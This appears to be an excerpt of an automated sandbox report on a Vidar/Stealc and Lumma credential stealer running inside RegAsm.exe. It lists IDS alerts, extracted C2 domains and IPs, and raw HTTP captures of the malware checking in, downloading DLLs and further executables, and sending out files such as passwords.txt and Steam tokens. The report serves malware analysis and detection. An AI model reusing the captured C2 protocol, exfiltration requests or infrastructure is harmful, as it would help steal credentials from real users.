Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [edx], cx 9_2_0041E6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [eax], cx 9_2_00423F07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 9_2_0043DF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp edx 9_2_0043A796

Networking

Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49739 -> 147.45.68.138:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.4:49739
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.4:49739
Source: Network traffic Suricata IDS: 2055575 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (awwardwiqi .shop) : 192.168.2.4:56576 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055576 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (awwardwiqi .shop in TLS SNI) : 192.168.2.4:49741 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.4:55775 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055489 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.4:64147 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.4:49743 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.4:49745 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:49744 -> 95.164.119.162:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.4:49751
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.4:49751
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49741 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49743 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49745 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 188.114.96.3:443
Source: Malware configuration extractor URLs: traineiwnqo.shop
Source: Malware configuration extractor URLs: caffegclasiqwp.shop
Source: Malware configuration extractor URLs: awwardwiqi.shop
Source: Malware configuration extractor URLs: stamppreewntnq.shop
Source: Malware configuration extractor URLs: evoliutwoqm.shop
Source: Malware configuration extractor URLs: millyscroqwp.shop
Source: Malware configuration extractor URLs: condedqpwqm.shop
Source: Malware configuration extractor URLs: locatedblsoqp.shop
Source: Malware configuration extractor URLs: stagedchheiqwo.shop
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199761128941
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:20 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:26 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:27 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:27 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:28 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:28 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:28 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:35 GMTContent-Type: application/octet-streamContent-Length: 328744Last-Modified: Thu, 29 Aug 2024 19:35:43 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d0cd8f-50428"X-Content-Type-Options: nosniffAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:37 GMTContent-Type: application/octet-streamContent-Length: 196648Last-Modified: Thu, 29 Aug 2024 19:35:54 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d0cd9a-30028"X-Content-Type-Options: nosniffAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAECAECFCAAEBFHIEHDHost: 147.45.68.138Content-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------GDAECAECFCAAEBFHIEHDContent-Disposition: form-data; name="hwid"C4571979ADE23924696330-a33c7340-61ca------GDAECAECFCAAEBFHIEHDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GDAECAECFCAAEBFHIEHD--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHIDHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="mode"1------GHJKJDAKEHJDGDGDGHID--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCAHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="mode"2------DHIEBAAKJDHIECAAFHCA--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAKKKKJDBKKFIEBKEHDHost: 147.45.68.138Content-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="mode"21------ECAKKKKJDBKKFIEBKEHD--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHJEBGIEBFIJKEBFBFHHost: 147.45.68.138Content-Length: 6325Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEHost: 147.45.68.138Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKKJEHDBGIDHJKJDBFHost: 147.45.68.138Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="file_data"------BGIJJKKJJDAAAAAKFHJJ--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHIDHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="file_data"------GHJKJDAKEHJDGDGDGHID--
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDHDBKEBGHJJJJKEHDHost: 147.45.68.138Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHIDHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="mode"3------GHJKJDAKEHJDGDGDGHID--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJJJECFIEBFHIEGHJDHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------KJKJJJECFIEBFHIEGHJDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------KJKJJJECFIEBFHIEGHJDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------KJKJJJECFIEBFHIEGHJDContent-Disposition: form-data; name="mode"4------KJKJJJECFIEBFHIEGHJD--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJKFBAFIDAEBFHJKJEBHost: 147.45.68.138Content-Length: 457Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="file_data"N+dA------AKJKFBAFIDAEBFHJKJEB--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDAHost: 147.45.68.138Content-Length: 115113Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJKHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="mode"5------CFIECBFIDGDAKFHIEHJK--
Source: global traffic HTTP traffic detected: GET /prog/66d0cd8fb6f7b_lgjfd.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEGHost: 147.45.68.138Content-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="mode"51------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="task_id"1035440------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="status"1------HIEBAKEHDHCAKEBFBKEG--
Source: global traffic HTTP traffic detected: GET /prog/66d0cd9a65b5d_vqwergf.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHDHost: 147.45.68.138Content-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="mode"51------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="task_id"1035441------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="status"1------JDGCGDBGCAAEBFIECGHD--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCAHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="mode"6------DHIEBAAKJDHIECAAFHCA--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFCAAAAFBAKEBFBAKKHost: stadiatechnologies.comContent-Length: 5777Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAEHost: 147.45.68.138Content-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="hwid"C4571979ADE23924696330-a33c7340-61ca------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------DAKJDHIEBFIIDGDGDBAE--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJECHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="token"24ebb61fa2561269400e7def790dee73------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="mode"1------CFHDBFIEGIDGIECBKJEC--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBGHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="token"24ebb61fa2561269400e7def790dee73------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="mode"2------IIDHJKFBGIIJJKFIJDBG--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFHHost: 147.45.68.138Content-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="token"24ebb61fa2561269400e7def790dee73------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="mode"21------GCBGIIECGHCAKECAFBFH--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBKKKFHCFIDHIECGCAFHost: 147.45.68.138Content-Length: 6301Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDHIDBFBFHIJKFHCGIEHost: 147.45.68.138Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 95.164.119.162
Source: Joe Sandbox View IP Address: 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3
Source: Joe Sandbox View ASN Name: VAKPoltavaUkraineUA
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49740 -> 147.45.44.104:80
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: awwardwiqi.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locatedblsoqp.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: traineiwnqo.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=fI53unXRlZI7SNoiT9of_nEXXAJBTipPy_qdTgUGuL8-1724964759-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: traineiwnqo.shop
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040503C InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 2_2_0040503C
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66d0cd8fb6f7b_lgjfd.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66d0cd9a65b5d_vqwergf.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: awwardwiqi.shop
Source: global traffic DNS traffic detected: DNS query: locatedblsoqp.shop
Source: global traffic DNS traffic detected: DNS query: stadiatechnologies.com
Source: global traffic DNS traffic detected: DNS query: traineiwnqo.shop
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: awwardwiqi.shop
Source: RegAsm.exe, 0000000C.00000002.2375283743.0000000000480000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: Http://147.45.68.138:80e
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d0cd8fb6f7b_lgjfd.exe
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d0cd8fb6f7b_lgjfd.exe1kkkk1035441http://147.45.44.104/prog/66d0cd9a65b5d
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d0cd8fb6f7b_lgjfd.exeorm-data;
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d0cd9a65b5d_vqwergf.exe
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d0cd9a65b5d_vqwergf.exem-data;
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.0000000001379000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/
Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/(
Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/G=6f
Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/KEBGI
Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/b=
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/freebl3.dll
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/mozglue.dll
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/mozglue.dll%
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/msvcp140.dll
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/msvcp140.dll?
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/nss3.dll9b
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/nss3.dllhb
Source: RegAsm.exe, 0000000C.00000002.2377742353.0000000001379000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/p
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/softokn3.dll
